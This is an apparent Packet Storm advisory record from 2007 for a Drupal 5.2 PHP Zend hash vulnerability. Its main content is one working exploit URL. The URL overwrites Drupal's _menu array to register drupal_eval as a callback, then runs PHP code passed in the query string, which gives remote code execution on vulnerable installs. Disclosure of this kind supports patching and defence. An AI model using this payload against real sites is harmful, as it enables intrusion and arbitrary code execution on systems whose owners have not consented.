drupal-hash.txt

2007-10-11T00:00:00
ID PACKETSTORM:59990
Type packetstorm
Reporter ShAnKaR
Modified 2007-10-11T00:00:00

Description

                                        
                                            `Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector  
  
Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();  
  
`